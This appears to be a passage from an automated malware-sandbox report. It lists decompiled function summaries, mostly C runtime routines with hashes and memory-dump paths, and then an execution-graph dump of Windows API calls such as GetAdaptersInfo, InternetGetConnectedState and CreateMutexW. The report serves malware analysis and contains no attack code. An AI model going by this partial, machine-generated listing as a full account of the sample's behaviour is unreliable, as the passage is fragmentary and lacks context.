                                                                                                                                                                        • Part of subcall function 0377EF39: std::exception::exception.LIBCMT ref: 0377EF74
                                                                                                                                                                      • std::_Xinvalid_argument.LIBCPMT ref: 03779128
                                                                                                                                                                      Strings
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 00000004.00000002.4159652948.0000000003770000.00000040.00001000.00020000.00000000.sdmp, Offset: 03770000, based on PE: true
                                                                                                                                                                      • Associated: 00000004.00000002.4159652948.00000000037A4000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                      • Snapshot File: hcaresult_4_2_3770000_UNK_.jbxd
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID: Xinvalid_argumentstd::_std::exception::exception$Exception@8Throw
                                                                                                                                                                      • String ID: string too long
                                                                                                                                                                      • API String ID: 963545896-2556327735
                                                                                                                                                                      • Opcode ID: 0b2ca60e89d21fafb96efad8324948de2346ef477880e8c920d577ed8d7b7a3d
                                                                                                                                                                      • Instruction ID: cba92930d61d5e7ce82b95ddba17a5e825d4b4e680d2e28d6ddcaf957cc4bf09
                                                                                                                                                                      • Opcode Fuzzy Hash: 0b2ca60e89d21fafb96efad8324948de2346ef477880e8c920d577ed8d7b7a3d
                                                                                                                                                                      • Instruction Fuzzy Hash: BE11C476345350CBCB21CE2CE804A1AB7E9ABE7621F140A6EE291CB741C771D815C3A4
                                                                                                                                                                      APIs
                                                                                                                                                                      • __CxxThrowException@8.LIBCMT ref: 0377941D
                                                                                                                                                                      • std::_Xinvalid_argument.LIBCPMT ref: 0377944A
                                                                                                                                                                      Strings
                                                                                                                                                                      • invalid string position, xrefs: 03779445
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 00000004.00000002.4159652948.0000000003770000.00000040.00001000.00020000.00000000.sdmp, Offset: 03770000, based on PE: true
                                                                                                                                                                      • Associated: 00000004.00000002.4159652948.00000000037A4000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                      • Snapshot File: hcaresult_4_2_3770000_UNK_.jbxd
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID: Exception@8ThrowXinvalid_argumentstd::_
                                                                                                                                                                      • String ID: invalid string position
                                                                                                                                                                      • API String ID: 3614006799-1799206989
                                                                                                                                                                      • Opcode ID: 40e59f42eb299c3c28296128d02b7115b1ae4b708bd0614fab2e6ad35cbc93aa
                                                                                                                                                                      • Instruction ID: 1028f1ae4f738cf36d145fa069716451221bb25a43e6f33e648e9742ba3b0ef8
                                                                                                                                                                      • Opcode Fuzzy Hash: 40e59f42eb299c3c28296128d02b7115b1ae4b708bd0614fab2e6ad35cbc93aa
                                                                                                                                                                      • Instruction Fuzzy Hash: 690149336013109BDB24EE6CDC8478AF3A9AF42660F150A6DE6529FAC1D771EA41C3E1
                                                                                                                                                                      APIs
                                                                                                                                                                      • __output_l.LIBCMT ref: 02BD6FFC
                                                                                                                                                                        • Part of subcall function 02BD70E4: __getptd_noexit.LIBCMT ref: 02BD70E4
                                                                                                                                                                      Strings
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 00000004.00000002.4154101487.0000000002BD0000.00000040.00001000.00020000.00000000.sdmp, Offset: 02BD0000, based on PE: false
                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                      • Snapshot File: hcaresult_4_2_2bd0000_UNK_.jbxd
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID: __getptd_noexit__output_l
                                                                                                                                                                      • String ID: B
                                                                                                                                                                      • API String ID: 2141734944-1255198513
                                                                                                                                                                      • Opcode ID: 9d13b0dc1e7cc3b4a828052403ade02a95932ad8b58c16c5deaaa246e36644c3
                                                                                                                                                                      • Instruction ID: 26c3cfbb534d5c28f3d13c4fa3d901ca8221c941ad22f4274a795039ba535cc1
                                                                                                                                                                      • Opcode Fuzzy Hash: 9d13b0dc1e7cc3b4a828052403ade02a95932ad8b58c16c5deaaa246e36644c3
                                                                                                                                                                      • Instruction Fuzzy Hash: 7D0169729042499BDF119FA8DC01BEEBBFAFB04364F0041A5E924A62C0EB759501DBA5
                                                                                                                                                                      APIs
                                                                                                                                                                      • __output_l.LIBCMT ref: 035FF1D4
                                                                                                                                                                        • Part of subcall function 035FF2DA: __getptd_noexit.LIBCMT ref: 035FF2DA
                                                                                                                                                                      Strings
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 00000004.00000002.4158929233.00000000035F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 035F0000, based on PE: false
                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                      • Snapshot File: hcaresult_4_2_35f0000_UNK_.jbxd
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID: __getptd_noexit__output_l
                                                                                                                                                                      • String ID: B
                                                                                                                                                                      • API String ID: 2141734944-1255198513
                                                                                                                                                                      • Opcode ID: 87aa76b5352f051ca7e96a60a55cb843f290c199b1586efbdbad223d858718fb
                                                                                                                                                                      • Instruction ID: 4e9fecea39a1654b3e7a8de0aff1942ca4b305ce39d8be7a435fcefddc134715
                                                                                                                                                                      • Opcode Fuzzy Hash: 87aa76b5352f051ca7e96a60a55cb843f290c199b1586efbdbad223d858718fb
                                                                                                                                                                      • Instruction Fuzzy Hash: 7F016D75E00249AFDF10EFA4DC01AEEBBB8FB45364F144159E924AA2D0D778D501CBB5
                                                                                                                                                                      APIs
                                                                                                                                                                      • std::_Xinvalid_argument.LIBCPMT ref: 0377957F
                                                                                                                                                                        • Part of subcall function 0377EF86: std::exception::exception.LIBCMT ref: 0377EF9B
                                                                                                                                                                        • Part of subcall function 0377EF86: __CxxThrowException@8.LIBCMT ref: 0377EFB0
                                                                                                                                                                        • Part of subcall function 0377EF86: std::exception::exception.LIBCMT ref: 0377EFC1
                                                                                                                                                                      • _memmove.LIBCMT ref: 037795B5
                                                                                                                                                                      Strings
                                                                                                                                                                      • invalid string position, xrefs: 0377957A
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 00000004.00000002.4159652948.0000000003770000.00000040.00001000.00020000.00000000.sdmp, Offset: 03770000, based on PE: true
                                                                                                                                                                      • Associated: 00000004.00000002.4159652948.00000000037A4000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                      • Snapshot File: hcaresult_4_2_3770000_UNK_.jbxd
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID: std::exception::exception$Exception@8ThrowXinvalid_argument_memmovestd::_
                                                                                                                                                                      • String ID: invalid string position
                                                                                                                                                                      • API String ID: 1785806476-1799206989
                                                                                                                                                                      • Opcode ID: 6e561602548df59aa423ef116e71b339430446235cbf67c9b2f2b17bdafc727a
                                                                                                                                                                      • Instruction ID: e127d9000e8cc613ec10c13525ccffd8e229ed22466485932702a251d5df9a93
                                                                                                                                                                      • Opcode Fuzzy Hash: 6e561602548df59aa423ef116e71b339430446235cbf67c9b2f2b17bdafc727a
                                                                                                                                                                      • Instruction Fuzzy Hash: BC01A2317017218FDB25CE2CED9462AF7E7DBC65907280A2CD291CBB8AD7B1DC428794
                                                                                                                                                                      APIs
                                                                                                                                                                      • std::_Xinvalid_argument.LIBCPMT ref: 0377D1D4
                                                                                                                                                                        • Part of subcall function 0377EF39: std::exception::exception.LIBCMT ref: 0377EF4E
                                                                                                                                                                        • Part of subcall function 0377EF39: __CxxThrowException@8.LIBCMT ref: 0377EF63
                                                                                                                                                                        • Part of subcall function 0377EF39: std::exception::exception.LIBCMT ref: 0377EF74
                                                                                                                                                                      • _memmove.LIBCMT ref: 0377D20D
                                                                                                                                                                      Strings
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 00000004.00000002.4159652948.0000000003770000.00000040.00001000.00020000.00000000.sdmp, Offset: 03770000, based on PE: true
                                                                                                                                                                      • Associated: 00000004.00000002.4159652948.00000000037A4000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                      • Snapshot File: hcaresult_4_2_3770000_UNK_.jbxd
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID: std::exception::exception$Exception@8ThrowXinvalid_argument_memmovestd::_
                                                                                                                                                                      • String ID: vector<T> too long
                                                                                                                                                                      • API String ID: 1785806476-3788999226
                                                                                                                                                                      • Opcode ID: d0e794852cdeeb9cfeca39db95e8a6a6d9bd9df9a41b8b0d5752cb5b1117a906
                                                                                                                                                                      • Instruction ID: cf85781785123f047ad4a869e0d19d78ffad52df29cb7783939a490abe37f379
                                                                                                                                                                      • Opcode Fuzzy Hash: d0e794852cdeeb9cfeca39db95e8a6a6d9bd9df9a41b8b0d5752cb5b1117a906
                                                                                                                                                                      • Instruction Fuzzy Hash: 3C01DD779046119FEB10EE6DE895C2E7798E680251BC9822AEC12C7608E774A8158750
                                                                                                                                                                      APIs
                                                                                                                                                                      • std::_Xinvalid_argument.LIBCPMT ref: 03778443
                                                                                                                                                                        • Part of subcall function 0377EF39: std::exception::exception.LIBCMT ref: 0377EF4E
                                                                                                                                                                        • Part of subcall function 0377EF39: __CxxThrowException@8.LIBCMT ref: 0377EF63
                                                                                                                                                                        • Part of subcall function 0377EF39: std::exception::exception.LIBCMT ref: 0377EF74
                                                                                                                                                                      • _memmove.LIBCMT ref: 0377846E
                                                                                                                                                                      Strings
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 00000004.00000002.4159652948.0000000003770000.00000040.00001000.00020000.00000000.sdmp, Offset: 03770000, based on PE: true
                                                                                                                                                                      • Associated: 00000004.00000002.4159652948.00000000037A4000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                      • Snapshot File: hcaresult_4_2_3770000_UNK_.jbxd
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID: std::exception::exception$Exception@8ThrowXinvalid_argument_memmovestd::_
                                                                                                                                                                      • String ID: vector<T> too long
                                                                                                                                                                      • API String ID: 1785806476-3788999226
                                                                                                                                                                      • Opcode ID: 2bceb334cb41c9771ae355cf3e834e3f4fe4b742e244084d21488709c33b424b
                                                                                                                                                                      • Instruction ID: 0c58be696cdc7eb4abc1f0356990a02e01ef2d10edeca4460a8c06ac29c69edb
                                                                                                                                                                      • Opcode Fuzzy Hash: 2bceb334cb41c9771ae355cf3e834e3f4fe4b742e244084d21488709c33b424b
                                                                                                                                                                      • Instruction Fuzzy Hash: 880162B16003099FDF24DEA9DC9A92BB3D9EF542147184A2DE45ACB740E670F801C761
                                                                                                                                                                      APIs
                                                                                                                                                                      Strings
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 00000004.00000002.4154101487.0000000002BD0000.00000040.00001000.00020000.00000000.sdmp, Offset: 02BD0000, based on PE: false
                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                      • Snapshot File: hcaresult_4_2_2bd0000_UNK_.jbxd
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID: CallFrame@12Setting__getptd
                                                                                                                                                                      • String ID: j
                                                                                                                                                                      • API String ID: 3454690891-2137352139
                                                                                                                                                                      • Opcode ID: 2a3c231524d2f5714940ff7c9f67256147f183406962bf184a7791e03a03933a
                                                                                                                                                                      • Instruction ID: 8929435d59c7487ddaed6665b5f73db80cc079a7f84983ba3ea02a34c19ee1ce
                                                                                                                                                                      • Opcode Fuzzy Hash: 2a3c231524d2f5714940ff7c9f67256147f183406962bf184a7791e03a03933a
                                                                                                                                                                      • Instruction Fuzzy Hash: 1311A971800264EBCF12EF58C4843BCBBB1FF00728F1880C9D89A2B682C375A991CF91
                                                                                                                                                                      APIs
                                                                                                                                                                        • Part of subcall function 0379010A: __getptd.LIBCMT ref: 03790110
                                                                                                                                                                        • Part of subcall function 0379010A: __getptd.LIBCMT ref: 03790120
                                                                                                                                                                      • __getptd.LIBCMT ref: 037906E3
                                                                                                                                                                        • Part of subcall function 03783E5B: __getptd_noexit.LIBCMT ref: 03783E5E
                                                                                                                                                                        • Part of subcall function 03783E5B: __amsg_exit.LIBCMT ref: 03783E6B
                                                                                                                                                                      • __getptd.LIBCMT ref: 037906F1
                                                                                                                                                                      Strings
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 00000004.00000002.4159652948.0000000003770000.00000040.00001000.00020000.00000000.sdmp, Offset: 03770000, based on PE: true
                                                                                                                                                                      • Associated: 00000004.00000002.4159652948.00000000037A4000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                      • Snapshot File: hcaresult_4_2_3770000_UNK_.jbxd
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID: __getptd$__amsg_exit__getptd_noexit
                                                                                                                                                                      • String ID: csm
                                                                                                                                                                      • API String ID: 803148776-1018135373
                                                                                                                                                                      • Opcode ID: b3fce28b2bddc590aa98f0218856aed1c2aaf2d0e4e6e47b24808f92d36aa4a8
                                                                                                                                                                      • Instruction ID: e79867cc140fc6f096fa6b5c0769a01562132085a2ee3ce18a8a587070ae8107
                                                                                                                                                                      • Opcode Fuzzy Hash: b3fce28b2bddc590aa98f0218856aed1c2aaf2d0e4e6e47b24808f92d36aa4a8
                                                                                                                                                                      • Instruction Fuzzy Hash: 3B014B38811305CEEF35DF66E8886BDB7FAAF04221F684A6FD0599A250DB309581CF41
                                                                                                                                                                      APIs
                                                                                                                                                                      • __getptd.LIBCMT ref: 02BE37AF
                                                                                                                                                                        • Part of subcall function 02BD98E6: __getptd_noexit.LIBCMT ref: 02BD98E9
                                                                                                                                                                        • Part of subcall function 02BD98E6: __amsg_exit.LIBCMT ref: 02BD98F6
                                                                                                                                                                      • __getptd.LIBCMT ref: 02BE37BD
                                                                                                                                                                      Strings
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 00000004.00000002.4154101487.0000000002BD0000.00000040.00001000.00020000.00000000.sdmp, Offset: 02BD0000, based on PE: false
                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                      • Snapshot File: hcaresult_4_2_2bd0000_UNK_.jbxd
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID: __getptd$__amsg_exit__getptd_noexit
                                                                                                                                                                      • String ID: csm
                                                                                                                                                                      • API String ID: 803148776-1018135373
                                                                                                                                                                      • Opcode ID: f0e1e4535676af74e2e30162e3fe80640730f6540ac6db6f2fff18db7859968d
                                                                                                                                                                      • Instruction ID: c28a44bafd5fa0485146cb14dedc36111eeda28129167feaf5159b072e0f9c9b
                                                                                                                                                                      • Opcode Fuzzy Hash: f0e1e4535676af74e2e30162e3fe80640730f6540ac6db6f2fff18db7859968d
                                                                                                                                                                      • Instruction Fuzzy Hash: 05014634800205DACF38AF21C444ABCB3F6EF04315F6488EED4A297290DB32A580DF61
                                                                                                                                                                      APIs
                                                                                                                                                                      • __getptd.LIBCMT ref: 036100A2
                                                                                                                                                                        • Part of subcall function 0360381A: __getptd_noexit.LIBCMT ref: 0360381D
                                                                                                                                                                        • Part of subcall function 0360381A: __amsg_exit.LIBCMT ref: 0360382A
                                                                                                                                                                      • __getptd.LIBCMT ref: 036100B0
                                                                                                                                                                      Strings
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 00000004.00000002.4158929233.00000000035F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 035F0000, based on PE: false
                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                      • Snapshot File: hcaresult_4_2_35f0000_UNK_.jbxd
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID: __getptd$__amsg_exit__getptd_noexit
                                                                                                                                                                      • String ID: csm
                                                                                                                                                                      • API String ID: 803148776-1018135373
                                                                                                                                                                      • Opcode ID: b3fce28b2bddc590aa98f0218856aed1c2aaf2d0e4e6e47b24808f92d36aa4a8
                                                                                                                                                                      • Instruction ID: d585524c3454fd122af8502121ac202c1501c4f49c648fa11338e335f2956eff
                                                                                                                                                                      • Opcode Fuzzy Hash: b3fce28b2bddc590aa98f0218856aed1c2aaf2d0e4e6e47b24808f92d36aa4a8
                                                                                                                                                                      • Instruction Fuzzy Hash: F30162388053059ACF78DFA5C54166EBBB9AF00212F6C845ED4C1AA790CB3895F1CB41
                                                                                                                                                                      APIs
                                                                                                                                                                        • Part of subcall function 02C732AE: __getptd.LIBCMT ref: 02C732B4
                                                                                                                                                                        • Part of subcall function 02C732AE: __getptd.LIBCMT ref: 02C732C4
                                                                                                                                                                      • __getptd.LIBCMT ref: 02C737D8
                                                                                                                                                                        • Part of subcall function 02C6990F: __getptd_noexit.LIBCMT ref: 02C69912
                                                                                                                                                                        • Part of subcall function 02C6990F: __amsg_exit.LIBCMT ref: 02C6991F
                                                                                                                                                                      • __getptd.LIBCMT ref: 02C737E6
                                                                                                                                                                      Strings
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 00000004.00000002.4154931234.0000000002C61000.00000020.00001000.00020000.00000000.sdmp, Offset: 02C60000, based on PE: true
                                                                                                                                                                      • Associated: 00000004.00000002.4154846887.0000000002C60000.00000004.00001000.00020000.00000000.sdmp
                                                                                                                                                                      • Associated: 00000004.00000002.4155188121.0000000002C75000.00000002.00001000.00020000.00000000.sdmp
                                                                                                                                                                      • Associated: 00000004.00000002.4155312703.0000000002C79000.00000004.00001000.00020000.00000000.sdmp
                                                                                                                                                                      • Associated: 00000004.00000002.4155545772.0000000002C7F000.00000020.00001000.00020000.00000000.sdmp
                                                                                                                                                                      • Associated: 00000004.00000002.4155630975.0000000002C81000.00000002.00001000.00020000.00000000.sdmp
                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                      • Snapshot File: hcaresult_4_2_2c60000_UNK_.jbxd
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID: __getptd$__amsg_exit__getptd_noexit
                                                                                                                                                                      • String ID: csm
                                                                                                                                                                      • API String ID: 803148776-1018135373
                                                                                                                                                                      • Opcode ID: f0e1e4535676af74e2e30162e3fe80640730f6540ac6db6f2fff18db7859968d
                                                                                                                                                                      • Instruction ID: e0b35dacb7c7e3d7778fdb13238e0573374c274289638d6a3b778842b4c45dce
                                                                                                                                                                      • Opcode Fuzzy Hash: f0e1e4535676af74e2e30162e3fe80640730f6540ac6db6f2fff18db7859968d
                                                                                                                                                                      • Instruction Fuzzy Hash: 60016D36801285CBCF34AF26C4447ACB3B6AF50215F5444AFD4905B660CB35A781FF11

                                                                                                                                                                      Execution Graph

                                                                                                                                                                      Execution Coverage:11.1%
                                                                                                                                                                      Dynamic/Decrypted Code Coverage:0%
                                                                                                                                                                      Signature Coverage:2.9%
                                                                                                                                                                      Total number of Nodes:2000
                                                                                                                                                                      Total number of Limit Nodes:163
78899 1e86dd 78896->78899 78913 1e86f1 78896->78913 78898 1e869c 78972 1e98d1 67 API calls __getptd_noexit 78898->78972 78974 1e98e4 67 API calls __getptd_noexit 78899->78974 78903 1e8749 78976 1e98e4 67 API calls __getptd_noexit 78903->78976 78904 1e86a3 78973 1ea5b1 6 API calls 2 library calls 78904->78973 78906 1e86e2 78975 1e98d1 67 API calls __getptd_noexit 78906->78975 78908 1e874e 78977 1e98d1 67 API calls __getptd_noexit 78908->78977 78910 1e867a 78910->78886 78912 1e86e9 78978 1ea5b1 6 API calls 2 library calls 78912->78978 78913->78903 78913->78910 78914 1e8725 78913->78914 78915 1e876a 78913->78915 78914->78903 78922 1e8730 ReadFile 78914->78922 78979 1f0596 78915->78979 78920 1e885c 78921 1e8bd7 GetLastError 78920->78921 78929 1e8870 78920->78929 78923 1e8a5d 78921->78923 78924 1e8be4 78921->78924 78922->78920 78922->78921 78938 1e89e2 78923->78938 78991 1e98f7 67 API calls 2 library calls 78923->78991 78993 1e98d1 67 API calls __getptd_noexit 78924->78993 78925 1e8788 78985 1e98d1 67 API calls __getptd_noexit 78925->78985 78926 1e87a6 78987 1ff555 69 API calls 3 library calls 78926->78987 78929->78938 78939 1e888c 78929->78939 78941 1e8aa2 78929->78941 78931 1e8be9 78994 1e98e4 67 API calls __getptd_noexit 78931->78994 78932 1e878d 78986 1e98e4 67 API calls __getptd_noexit 78932->78986 78934 1e87b2 78934->78922 78937 1e49fc __mtinitlocknum 67 API calls 78937->78910 78938->78910 78938->78937 78940 1e88f2 ReadFile 78939->78940 78949 1e896f 78939->78949 78943 1e8910 GetLastError 78940->78943 78952 1e891a 78940->78952 78941->78938 78942 1e8b1a ReadFile 78941->78942 78944 1e8b39 GetLastError 78942->78944 78950 1e8b43 78942->78950 78943->78939 78943->78952 78944->78941 78944->78950 78945 1e8a33 MultiByteToWideChar 78945->78938 78946 1e8a57 GetLastError 78945->78946 78946->78923 78947 1e89dd 78989 1e98d1 67 API calls __getptd_noexit 78947->78989 78948 1e89ea 78955 1e89a7 78948->78955 78956 1e8a21 78948->78956 78949->78938 78949->78947 78949->78948 
78949->78955 78950->78941 78992 1ff555 69 API calls 3 library calls 78950->78992 78952->78939 78988 1ff555 69 API calls 3 library calls 78952->78988 78955->78945 78990 1ff555 69 API calls 3 library calls 78956->78990 78958 1e8a30 78958->78945 78959->78868 78960->78881 78961->78872 78962->78876 78964->78878 78965->78876 78966->78887 78967->78886 78968->78881 78969->78895 78970->78910 78971->78898 78972->78904 78974->78906 78975->78912 78976->78908 78977->78912 78981 1f059f 78979->78981 78980 1e5674 _malloc 66 API calls 78980->78981 78981->78980 78982 1e8780 78981->78982 78983 1f05b6 Sleep 78981->78983 78982->78925 78982->78926 78984 1f05cb 78983->78984 78984->78981 78984->78982 78985->78932 78986->78910 78987->78934 78988->78952 78989->78938 78990->78958 78991->78938 78992->78950 78993->78931 78994->78938 78995 1ba5ad 79010 1e5421 78995->79010 78997 1ba5b9 GetParent ShowWindow 79011 1ba3b3 GetClientRect 78997->79011 79010->78997 79025 1b9cbe 79011->79025 79013 1ba438 79014 1ba449 ShowWindow 79013->79014 79015 1ba45e 79014->79015 79026 1b9ccf 79025->79026 79031 18ee0d 79026->79031 79030 1b9d17 79030->79013 79043 18e84d 79031->79043 79034 1b56bd 79067 1777af 79034->79067 79037 1b56df 79039 1b56db 79037->79039 79074 179677 79037->79074 79038 1b56d3 SetLastError 79038->79039 79039->79030 79044 18e85f 79043->79044 79048 18e8dd 79043->79048 79045 18e87c EnterCriticalSection 79044->79045 79044->79048 79046 18e971 79045->79046 79047 18e897 79045->79047 79051 1783c2 LeaveCriticalSection 79046->79051 79049 18e89e GetClassInfoExW 79047->79049 79050 18e905 LoadCursorW 79047->79050 79048->79034 79052 18e8c3 GetClassInfoExW 79049->79052 79053 18e8e4 79049->79053 79050->79053 79051->79048 79052->79053 79054 18e8d5 79052->79054 79056 18e943 GetClassInfoExW 79053->79056 79065 18d630 67 API calls swprintf 79053->79065 79062 1783c2 79054->79062 79056->79046 79059 18e968 79056->79059 79066 18e498 76 API calls 79059->79066 79060 18e93d 79060->79056 79063 1783d7 79062->79063 79064 1783cb 
LeaveCriticalSection 79062->79064 79063->79048 79064->79063 79065->79060 79066->79046 79068 1777b7 79067->79068 79069 1777c2 79067->79069 79080 1dfcad 16 API calls 79068->79080 79081 177774 GetCurrentProcess FlushInstructionCache 79069->79081 79072 1777bc 79072->79069 79073 1777d1 79072->79073 79073->79037 79073->79038 79075 179687 RaiseException 79074->79075 79076 179696 79074->79076 79075->79076 79076->79075 79077 1796a4 GetCurrentThreadId EnterCriticalSection 79076->79077 79078 1783c2 LeaveCriticalSection 79077->79078 79079 1796d1 CreateWindowExW 79078->79079 79079->79039 79080->79072 79081->79073 79083 1b1e2d 79084 1b1e39 __EH_prolog3 79083->79084 79094 16ba90 79084->79094 79091 1b1eb1 79092 1b1ef2 SetWindowPos 79091->79092 79093 1b1f0d std::_Locinfo::_Locinfo ctype 79092->79093 79095 16baa5 79094->79095 79096 16ba9b 79094->79096 79098 16cf00 79095->79098 79106 16dfb0 InitializeCriticalSection RaiseException std::_String_base::_Xlen __CxxThrowException@8 79096->79106 79099 16cf25 GetWindowTextW 79098->79099 79100 16cf1d 79098->79100 79102 17d354 79099->79102 79107 16cf60 69 API calls 2 library calls 79100->79107 79104 17d360 _wcsnlen 79102->79104 79108 16cf30 79104->79108 79106->79095 79107->79099 79109 16cf38 79108->79109 79110 16cf3f GetDC GetWindowRect 79109->79110 79113 16dfb0 InitializeCriticalSection RaiseException std::_String_base::_Xlen __CxxThrowException@8 79109->79113 79110->79091 79112 16cf57 79113->79112 79114 1b2322 79117 1b2167 79114->79117 79116 1b2346 79118 1b2179 79117->79118 79128 1b219a 79117->79128 79119 1b2181 79118->79119 79120 1b21b6 79118->79120 79147 1b20a9 79119->79147 79121 1b21bd 79120->79121 79122 1b21dc 79120->79122 79182 1b1458 IsWindow IsWindowVisible PostMessageW InvalidateRect 79121->79182 79123 1b21e3 79122->79123 79124 1b21f1 79122->79124 79173 1b1513 IsWindow 79123->79173 79126 1b21f8 79124->79126 79127 1b2217 79124->79127 79177 1b14af IsWindow 79126->79177 79129 1b221e 79127->79129 79130 1b2240 79127->79130 79128->79116 
79183 1b156b InvalidateRect 79129->79183 79132 1b2269 79130->79132 79133 1b2247 79130->79133 79136 1b2270 79132->79136 79140 1b2292 79132->79140 79184 1b1304 _TrackMouseEvent 79133->79184 79135 1b21da 79135->79128 79185 1b158c InvalidateRect 79136->79185 79143 1b22dc 79140->79143 79186 1b15b4 IsWindowEnabled LoadCursorW SetCursor 79140->79186 79144 1b22f9 79143->79144 79187 1b1894 InvalidateRect 79143->79187 79144->79128 79188 1b18a4 InvalidateRect 79144->79188 79148 1b20b8 __EH_prolog3_GS 79147->79148 79189 197451 79148->79189 79152 1b20f8 79195 1a6537 GetWindowRect 79152->79195 79155 1b2130 79159 1b213f 79155->79159 79160 1b2135 79155->79160 79156 1b2117 79157 1b2129 79156->79157 79158 1b2122 79156->79158 79210 1b1a42 79157->79210 79197 1b1f15 79158->79197 79164 1b2127 79159->79164 79225 1b1d08 79159->79225 79237 1b1b7b 84 API calls 4 library calls 79160->79237 79238 197395 DeleteObject BitBlt SelectObject DeleteDC ctype 79164->79238 79165 1b213d 79165->79164 79168 1b2157 79239 19747c EndPaint 79168->79239 79174 1b1535 PostMessageW 79173->79174 79175 1b1554 InvalidateRect 79173->79175 79174->79175 79176 1b1568 79175->79176 79176->79128 79178 1b14f9 InvalidateRect 79177->79178 79179 1b14cd IsWindowEnabled 79177->79179 79181 1b150f 79178->79181 79179->79178 79180 1b14da PostMessageW 79179->79180 79180->79178 79181->79128 79182->79135 79183->79128 79184->79128 79185->79128 79186->79140 79187->79144 79188->79128 79190 197469 BeginPaint 79189->79190 79191 197474 GetClientRect 79189->79191 79190->79191 79192 197323 CreateCompatibleDC 79191->79192 79243 196393 CreateCompatibleBitmap 79192->79243 79194 19736a SelectObject SetViewportOrgEx 79194->79152 79196 1a6560 79195->79196 79196->79155 79196->79156 79244 1e5421 79197->79244 79199 1b1f21 IsWindowEnabled 79200 1b1f32 GetClientRect 79199->79200 79282 1e5421 79210->79282 79212 1b1a4e IsWindowEnabled 79213 1b1a68 GetClientRect 79212->79213 79226 1b1d14 __EH_prolog3 79225->79226 79227 16ba90 std::_String_base::_Xlen 2 API 
calls 79226->79227 79228 1b1d3a 79227->79228 79237->79165 79238->79168 79243->79194 79244->79199 79282->79212 79290 5f4ea873 79291 5f4ea885 79290->79291 79292 5f4ea8a1 GetAdaptersInfo 79291->79292 79294 5f4ea89d 79291->79294 79293 5f4ea8bc 79292->79293 79292->79294 79293->79294 79295 5f4ea8fc GetTickCount 79293->79295 79296 5f4ea917 79295->79296 79298 5f4ea936 79296->79298 79299 5f52b8e5 __output_l __flsbuf __getptd_noexit __lseeki64 79296->79299 79298->79294 79299->79296 79300 17bba9 79409 1b03a0 79300->79409 79410 1b03af __EH_prolog3 79409->79410 79411 16ba90 std::_String_base::_Xlen 2 API calls 79410->79411 79412 1b03bd 79411->79412 79413 16ba90 std::_String_base::_Xlen 2 API calls 79412->79413 79414 1b03ca 79413->79414 79415 16bf10 78 API calls 79414->79415 79416 1b03db 79415->79416 79417 16bf10 78 API calls 79416->79417 79418 1b03e6 79417->79418 79751 1afd5a 79418->79751 79752 1afd66 __EH_prolog3 79751->79752 79825 1a65fa 79752->79825 79826 1a6606 __EH_prolog3 79825->79826 79827 1ca3f4 2 API calls 79826->79827 79828 1a6622 79827->79828 79829 1ca3f4 2 API calls 79828->79829 79830 1a662e 79829->79830 79831 16ba90 std::_String_base::_Xlen 2 API calls 79830->79831 81489 1c895e InternetGetConnectedState 81490 1c8972 81489->81490 81491 1c8978 81490->81491 81494 1c88eb 69 API calls 2 library calls 81490->81494 81493 1c8982 81494->81493 81495 184c5a 81496 184c68 TlsGetValue 81495->81496 81497 184c64 81495->81497 81496->81497 81500 183dcb 81497->81500 81499 184c83 81501 183dd7 __EH_prolog3 81500->81501 81502 181e07 RaiseException 81501->81502 81503 183de1 81502->81503 81504 17dd3e 2 API calls 81503->81504 81505 183dfb 81504->81505 81506 182a00 3 API calls 81505->81506 81507 183e03 std::_Locinfo::_Locinfo ctype 81506->81507 81507->81499 81508 1cbd58 CreateMutexW 81509 1cbd75 GetLastError 81508->81509 81510 1cbdc1 81508->81510 81511 1cbda2 EnterCriticalSection 81509->81511 81512 1cbd82 CloseHandle FindWindowW 81509->81512 81515 1cbc34 76 API calls 81511->81515 
